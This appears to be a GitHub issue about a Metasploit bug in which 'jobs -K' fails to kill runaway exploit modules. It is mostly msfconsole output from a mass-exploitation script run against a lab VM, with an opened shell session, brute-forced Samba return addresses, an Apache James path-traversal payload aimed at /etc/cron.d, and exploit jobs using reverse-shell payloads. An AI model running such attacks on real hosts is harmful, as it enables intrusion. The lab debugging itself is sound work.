/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:23:in `<main>'
resource (masspwn.2974202.msf)> sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               0.0.0.0:0 -> 10.0.1.6:6200 (10.0.1.6)

[*] Starting persistent handler(s)...
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Registering with the IRC Server...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Joining the #channel channel...
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Joining the #channel channel...
[-] 10.0.1.6:139 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] 10.0.1.6:139 - Trying return address 0xbfbff7fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffeffc...
[*] 10.0.1.6:139 - Trying return address 0xffbff770...
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Exploiting the Ra1NX bot...
[-] 10.0.1.6:5900 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Exploiting the malicious IRC bot...
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Registering with the pbot...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbff6fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffedfc...
[*] 10.0.1.6:139 - Trying return address 0xffbff6f0...
[-] 10.0.1.6:6667 - 10.0.1.6:6667 - Error registering with the pbot
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbff5fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffebfc...
[*] 10.0.1.6:139 - Trying return address 0xffbff670...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
j[*] 10.0.1.6:139 - Trying return address 0xbfbff4fc...
o[*] 10.0.1.6:139 - Trying return address 0xbfffe9fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff5f0...
ks [*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
-[*] 10.0.1.6:139 - Trying return address 0xbfbff3fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffe7fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff570...
K
[-] Unknown command: joks.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbff2fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffe5fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff4f0...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
jobs[*] 10.0.1.6:139 - Trying return address 0xbfbff1fc...
 [*] 10.0.1.6:139 - Trying return address 0xbfffe3fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff470...
-K
Stopping all jobs...
[-] 10.0.1.6:25 - Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password 'sIDOsPUoX'
[-] Error while running command jobs: The connection was refused by the remote host (10.0.1.6:4555).

Call stack:
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:298:in `rescue in create_by_type'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:263:in `create_by_type'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:33:in `create'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket.rb:49:in `create_param'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/tcp.rb:37:in `create_param'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/tcp.rb:28:in `create'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit/tcp.rb:106:in `connect'
/home/marshall/Hack/Tools/metasploit-framework/modules/exploits/linux/smtp/apache_james_exec.rb:118:in `execute_james_admin_tool_command'
/home/marshall/Hack/Tools/metasploit-framework/modules/exploits/linux/smtp/apache_james_exec.rb:152:in `cleanup'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `block in job_cleanup_proc'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `synchronize'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `job_cleanup_proc'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:154:in `block in run'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/job.rb:62:in `stop'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/job_container.rb:75:in `stop_job'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:140:in `block (2 levels) in cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:139:in `each_key'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:139:in `block in cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:58:in `block (3 levels) in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:48:in `each_pair'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:48:in `block (2 levels) in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:47:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:47:in `block in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `each_with_index'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:127:in `cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:23:in `<main>'
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbff0fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffe1fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff3f0...
jo[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
bs [*] 10.0.1.6:139 - Trying return address 0xbfbfeffc...
[*] 10.0.1.6:139 - Trying return address 0xbfffdffc...
[*] 10.0.1.6:139 - Trying return address 0xffbff370...
-K
Stopping all jobs...
[-] 10.0.1.6:25 - Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password 'sIDOsPUoX'
[-] Error while running command jobs: The connection was refused by the remote host (10.0.1.6:4555).

Call stack:
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:298:in `rescue in create_by_type'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:263:in `create_by_type'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:33:in `create'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket.rb:49:in `create_param'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/tcp.rb:37:in `create_param'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/tcp.rb:28:in `create'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit/tcp.rb:106:in `connect'
/home/marshall/Hack/Tools/metasploit-framework/modules/exploits/linux/smtp/apache_james_exec.rb:118:in `execute_james_admin_tool_command'
/home/marshall/Hack/Tools/metasploit-framework/modules/exploits/linux/smtp/apache_james_exec.rb:152:in `cleanup'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `block in job_cleanup_proc'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `synchronize'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `job_cleanup_proc'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:154:in `block in run'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/job.rb:62:in `stop'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/job_container.rb:75:in `stop_job'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:140:in `block (2 levels) in cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:139:in `each_key'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:139:in `block in cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:58:in `block (3 levels) in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:48:in `each_pair'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:48:in `block (2 levels) in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:47:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:47:in `block in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `each_with_index'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:127:in `cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:23:in `<main>'
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbfeefc...
[*] 10.0.1.6:139 - Trying return address 0xbfffddfc...
[*] 10.0.1.6:139 - Trying return address 0xffbff2f0...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
jo[*] 10.0.1.6:139 - Trying return address 0xbfbfedfc...
[*] 10.0.1.6:139 - Trying return address 0xbfffdbfc...
[*] 10.0.1.6:139 - Trying return address 0xffbff270...                                                                                                                                                                                                                                                                       [*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbfecfc...
[*] 10.0.1.6:139 - Trying return address 0xbfffd9fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff1f0...
jobs

Jobs
====

  Id   Name                                                     Payload                            Payload opts
  --   ----                                                     -------                            ------------
  36   Exploit: linux/smtp/apache_james_exec                    linux/x64/meterpreter/reverse_tcp  tcp://10.0.1.4:2042
  88   Exploit: windows/http/xitami_if_mod_since                windows/meterpreter/reverse_tcp    tcp://10.0.1.4:2100
  97   Exploit: osx/samba/trans2open                            osx/ppc/shell/reverse_tcp          tcp://10.0.1.4:2109
  98   Exploit: solaris/samba/trans2open                        generic/shell_reverse_tcp          tcp://10.0.1.4:2110
  100  Exploit: linux/samba/chain_reply                         linux/x86/meterpreter/reverse_tcp  tcp://10.0.1.4:2112
  101  Exploit: freebsd/samba/trans2open                        bsd/x86/shell/reverse_tcp          tcp://10.0.1.4:2113
  103  Exploit: windows/smb/ms09_050_smb2_negotiate_func_index  windows/meterpreter/reverse_tcp    tcp://10.0.1.4:2115

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbfebfc...
[*] 10.0.1.6:139 - Trying return address 0xbfffd7fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff170...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbfeafc...
[*] 10.0.1.6:139 - Trying return address 0xbfffd5fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff0f0...
job[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
s[*] 10.0.1.6:139 - Trying return address 0xbfbfe9fc...
 [*] 10.0.1.6:139 - Trying return address 0xbfffd3fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff070...
-k [*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbfe8fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffd1fc...
[*] 10.0.1.6:139 - Trying return address 0xffbfeff0...                                                                                                                                                                                                                                                                       [*] 10.0.1.6:139 - Trying return address 0x081ed5f2...                                                                                                                                                                                                                                                                          [*] 10.0.1.6:139 - Trying return address 0xbfbfe7fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffcffc...
[*] 10.0.1.6:139 - Trying return address 0xffbfef70...                                                                                                                                                                                                                                                                    [*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbfe6fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffcdfc...
[*] 10.0.1.6:139 - Trying return address 0xffbfeef0...
jobs[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
 [*] 10.0.1.6:139 - Trying return address 0xbfbfe5fc...
-[*] 10.0.1.6:139 - Trying return address 0xbfffcbfc...
[*] 10.0.1.6:139 - Trying return address 0xffbfee70...
K
Stopping all jobs...
[-] 10.0.1.6:25 - Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password 'sIDOsPUoX'
[-] Error while running command jobs: The connection was refused by the remote host (10.0.1.6:4555).

Call stack:
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:298:in `rescue in create_by_type'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:263:in `create_by_type'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:33:in `create'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket.rb:49:in `create_param'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/tcp.rb:37:in `create_param'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/tcp.rb:28:in `create'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit/tcp.rb:106:in `connect'
/home/marshall/Hack/Tools/metasploit-framework/modules/exploits/linux/smtp/apache_james_exec.rb:118:in `execute_james_admin_tool_command'
/home/marshall/Hack/Tools/metasploit-framework/modules/exploits/linux/smtp/apache_james_exec.rb:152:in `cleanup'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `block in job_cleanup_proc'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `synchronize'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `job_cleanup_proc'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:154:in `block in run'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/job.rb:62:in `stop'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/job_container.rb:75:in `stop_job'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:140:in `block (2 levels) in cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:139:in `each_key'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:139:in `block in cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:58:in `block (3 levels) in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:48:in `each_pair'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:48:in `block (2 levels) in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:47:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:47:in `block in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `each_with_index'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:127:in `cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:23:in `<main>'
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbfe4fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffc9fc...
[*] 10.0.1.6:139 - Trying return address 0xffbfedf0...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbfe3fc...
[*] 10.0.1.6:139 - Trying return address 0xbfffc7fc...
[*] 10.0.1.6:139 - Trying return address 0xffbfed70...
[*] 10.0.1.6:139 - Trying return address 0xbfbfe2fc...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfffc5fc...
[*] 10.0.1.6:139 - Trying return address 0xffbfecf0...
[*] 10.0.1.6:139 - Trying return address 0xbfbfe1fc...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfffc3fc...
[*] 10.0.1.6:139 - Trying return address 0xffbfec70...
[*] 10.0.1.6:139 - Trying return address 0xbfbfe0fc...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfffc1fc...
[*] 10.0.1.6:139 - Trying return address 0xffbfebf0...
[*] 10.0.1.6:139 - Trying return address 0xbfbfdffc...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfffbffc...
[*] 10.0.1.6:139 - Trying return address 0xffbfeb70...
[*] 10.0.1.6:139 - Trying return address 0xbfbfdefc...
[*] 10.0.1.6:139 - Trying return address 0xbfffbdfc...
[*] 10.0.1.6:139 - Trying return address 0xffbfeaf0...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbfddfc...
[*] 10.0.1.6:139 - Trying return address 0xbfffbbfc...
[*] 10.0.1.6:139 - Trying return address 0xffbfea70...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
adfoster-r7 commented 3 years ago

@oxagast A minimal reproducible example to help get this fixed would be greatly appreciated :+1:

oxagast commented 3 years ago

To reproduce this issue you can use this script: https://github.com/oxagast/oxasploits/blob/master/tools/autopreter.pl against something like a Metasploitable VM.

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

oxagast commented 3 years ago

For now I've written a workaround into my script to get around the runaway modules. It seems that trans2open and or chain_reply are the offending exploit modules that won't die with jobs -K.

adfoster-r7 commented 3 years ago

Ran through the autopreter script, generated a resource file, and replicated the error against metasploitable2 :+1: